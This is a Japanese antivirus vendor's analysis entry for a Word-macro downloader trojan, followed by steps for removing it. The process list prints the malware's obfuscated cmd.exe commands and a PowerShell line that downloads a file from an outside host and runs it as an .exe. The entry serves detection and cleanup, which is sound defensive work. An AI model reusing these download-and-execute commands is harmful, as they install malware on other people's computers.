Trojan.W97M.POWLOAD.AMQ
Trojan-Downloader.MSWord.Agent.cfm (KASPERSKY)
Windows
- マルウェアタイプ: トロイの木馬型
- 破壊活動の有無: なし
- 暗号化:
- 感染報告の有無: はい
概要
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
詳細
侵入方法
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
マルウェアは、以下のファイルを作成します。
- %User Temp%\{Random Characters}.ps1
- %User Temp%\{Random Characters}.psm1
- %Application Data%\Microsoft\Office\Recent\{Malware File Name}.doc.LNK
(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。. %Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Roaming" です。)
マルウェアは、以下のプロセスを追加します。
- cmd /c %PRogrAmDaTa:~0,1%%ProgRAmData:~9,2% /v: /c "set CBku=5pr+Ls;t7Gui\ng,fz2S=@C.PdWbe:RcEw0)/B$1TUx l(NMyvFmj8Z3AI6~a{hoD9-}'4%kO& FOR %z In ( 1 63 33 70 24 41 37 4 57 22 29 59 0 15 39 70 2 70 19 32 19 19 57 72 46 46 56 47 32 29 59 66 69 15 39 70 62 70 40 32 47 24 29 59 66 55 15 39 70 44 44 43 38 17 18 18 8 20 68 13 39 69 69 68 6 38 62 69 34 58 20 13 28 33 66 63 27 52 28 31 7 43 46 28 7 23 26 28 27 22 44 11 28 13 7 6 38 2 18 53 34 20 68 62 7 7 1 29 36 36 16 2 28 28 23 25 11 28 14 63 60 44 28 42 23 31 63 51 36 55 18 53 65 16 71 52 5 25 16 48 10 55 23 27 11 13 68 23 19 1 44 11 7 45 68 21 68 35 6 38 52 18 53 65 20 68 11 69 69 65 68 6 38 4 8 69 18 43 20 43 68 0 69 8 68 6 38 17 55 18 18 20 68 63 55 55 34 68 6 38 52 65 55 34 20 38 28 13 49 29 1 10 27 44 11 31 3 68 12 68 3 38 4 8 69 18 3 68 23 28 42 28 68 6 16 63 2 28 60 31 62 45 38 17 65 18 0 43 11 13 43 38 2 18 53 34 35 61 7 2 48 61 38 62 69 34 58 23 64 63 33 13 44 63 60 25 50 11 44 28 45 38 17 65 18 0 15 43 38 52 65 55 34 35 6 38 33 53 8 18 20 68 56 18 53 55 68 6 57 16 43 45 45 9 28 7 66 57 7 28 51 43 38 52 65 55 34 35 23 44 28 13 14 7 62 43 66 14 28 43 53 34 34 34 34 35 43 61 57 13 49 63 71 28 66 57 7 28 51 43 38 52 65 55 34 6 38 54 65 65 69 20 68 22 0 55 8 68 6 27 2 28 60 71 6 67 67 31 60 7 31 62 61 67 67 38 30 58 8 58 20 68 33 39 0 18 68 6 81) DO SEt 2fvq=!2fvq!!CBku:~ %z, 1!&&if %z == 81 ecHo !2fvq:~ -408!| FOR /F "delims=TFSH tokens=1" %J IN ('ftype^^^|findstr mdFi')DO %J "
- CmD /v: /c "set CBku=5pr+Ls;t7Gui\ng,fz2S=@C.PdWbe:RcEw0)/B$1TUx l(NMyvFmj8Z3AI6~a{hoD9-}'4%kO& FOR %z In ( 1 63 33 70 24 41 37 4 57 22 29 59 0 15 39 70 2 70 19 32 19 19 57 72 46 46 56 47 32 29 59 66 69 15 39 70 62 70 40 32 47 24 29 59 66 55 15 39 70 44 44 43 38 17 18 18 8 20 68 13 39 69 69 68 6 38 62 69 34 58 20 13 28 33 66 63 27 52 28 31 7 43 46 28 7 23 26 28 27 22 44 11 28 13 7 6 38 2 18 53 34 20 68 62 7 7 1 29 36 36 16 2 28 28 23 25 11 28 14 63 60 44 28 42 23 31 63 51 36 55 18 53 65 16 71 52 5 25 16 48 10 55 23 27 11 13 68 23 19 1 44 11 7 45 68 21 68 35 6 38 52 18 53 65 20 68 11 69 69 65 68 6 38 4 8 69 18 43 20 43 68 0 69 8 68 6 38 17 55 18 18 20 68 63 55 55 34 68 6 38 52 65 55 34 20 38 28 13 49 29 1 10 27 44 11 31 3 68 12 68 3 38 4 8 69 18 3 68 23 28 42 28 68 6 16 63 2 28 60 31 62 45 38 17 65 18 0 43 11 13 43 38 2 18 53 34 35 61 7 2 48 61 38 62 69 34 58 23 64 63 33 13 44 63 60 25 50 11 44 28 45 38 17 65 18 0 15 43 38 52 65 55 34 35 6 38 33 53 8 18 20 68 56 18 53 55 68 6 57 16 43 45 45 9 28 7 66 57 7 28 51 43 38 52 65 55 34 35 23 44 28 13 14 7 62 43 66 14 28 43 53 34 34 34 34 35 43 61 57 13 49 63 71 28 66 57 7 28 51 43 38 52 65 55 34 6 38 54 65 65 69 20 68 22 0 55 8 68 6 27 2 28 60 71 6 67 67 31 60 7 31 62 61 67 67 38 30 58 8 58 20 68 33 39 0 18 68 6 81) DO SEt 2fvq=!2fvq!!CBku:~ %z, 1!&&if %z == 81 ecHo !2fvq:~ -408!| FOR /F "delims=TFSH tokens=1" %J IN ('ftype^^^|findstr mdFi')DO %J "
- %System%\cmd.exe /S /D /c" ecHo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $z227='n144';$h406=new-object Net.WebClient;$r280='http://free.{BLOCKED}lex.com/3289fkjsdfyu3.bin'.Split('@');$j289='i449';$L742 = '547';$z322='o330';$j930=$env:public+'\'+$L742+'.exe';foreach($z925 in $r280){try{$h406.DownloadFile($z925, $j930);$w872='A283';If ((Get-Item $j930).length -ge 80000) {Invoke-Item $j930;$Z994='C537';break;}}catch{}}$R676='w152';"
- %System%\cmd.exe /S /D /c" FOR /F "delims=TFSH tokens=1" %J IN ('ftype^|findstr mdFi') DO %J "
- %System%\cmd.exe /c ftype|findstr mdFi
- %System%\cmd.exe /S /D /c" ftype"
- %System%\findstr.exe findstr mdFi
- powershell $z227='n144';$h406=new-object Net.WebClient;$r280='http://free.{BLOCKED}lex.com/3289fkjsdfyu3.bin'.Split('@');$j289='i449';$L742 = '547';$z322='o330';$j930=$env:public+'\'+$L742+'.exe';foreach($z925 in $r280){try{$h406.DownloadFile($z925, $j930);$w872='A283';If ((Get-Item $j930).length -ge 80000) {Invoke-Item $j930;$Z994='C537';break;}}catch{}}$R676='w152';
その他
マルウェアは、以下の不正なWebサイトにアクセスします。
- http://free.{BLOCKED}lex.com/3289fkjsdfyu3.bin
対応方法
手順 1
トレンドマイクロの機械学習型検索は、マルウェアの存在を示す兆候が確認された時点で検出し、マルウェアが実行される前にブロックします。機械学習型検索が有効になっている場合、弊社のウイルス対策製品はこのマルウェアを以下の機械学習型検出名として検出します。
- Downloader.VBA.TRX.XXVBAF01FF059
手順 2
Windows 7、Windows 8、Windows 8.1、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。
手順 3
このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。
手順 4
以下のファイルを検索し削除します。
- %User Temp%\{Random Characters}.ps1
- %User Temp%\{Random Characters}.psm1
- %Application Data%\Microsoft\Office\Recent\{Malware File Name}.doc.LNK
手順 5
最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.W97M.POWLOAD.AMQ」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
ご利用はいかがでしたか? アンケートにご協力ください